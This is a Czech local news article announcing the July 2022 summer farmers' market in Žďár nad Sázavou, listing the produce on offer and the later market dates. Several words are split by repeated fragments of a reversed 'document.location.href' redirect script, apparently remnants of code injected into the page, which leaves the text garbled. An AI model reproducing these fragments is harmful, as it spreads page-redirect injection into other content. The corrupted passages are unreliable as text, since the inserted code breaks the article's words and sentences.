Rainbow page separator

Letní farmářský trh nabídne sezonní produkty i koláč ke kávě

Úterý, 19. července 2022

Žďár nad Sázavou / Na prázdninový farmářský trh plný sezonní čerstvé zeleniny a ovoce či květin se mohou těšit lidé ve Žďáře v sobotu 23. července. Začátek le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos v pořadí už čtvrtého trhu na náměstí Republiky je jako již tradičně v osm hodin ráno, konec půl hodiny před polednem.
Zájemci opět dostanou možnost nakoupit si ve stáncích především čerstvé sezonní ovoce a zeleninu, ale i další sortiment nabízený farmáři a prvovýrobci. Nebude tak chybět pečivo z regionálních pekáren, cukrovinky, mléčné a masné výrobky, uzeniny či med, ale například i koření, sirupy, čaje a řada dalších produktů.
Sezonní farmářské trhy se na žďárském náměstí ve své stávající podobě konají od roku 2012. Obvykle jich bývá šest ročně, vždy jeden měsíčně, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v době od května do října. Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos si však lidé se zájmem o nákup potravin s jasným původem mohou ve stáncích vybírat sedmkrát, neboť úvodní trh se odehrál už poslední dubnový den. Pátý farmářský trh je v plánu v sobotu 20. srpna. Na podzim se pak farmáři a prvovýrobci při šestém trhu sejdou 17. září a sedmá akce ukončí sezonu v sobotu 15. října.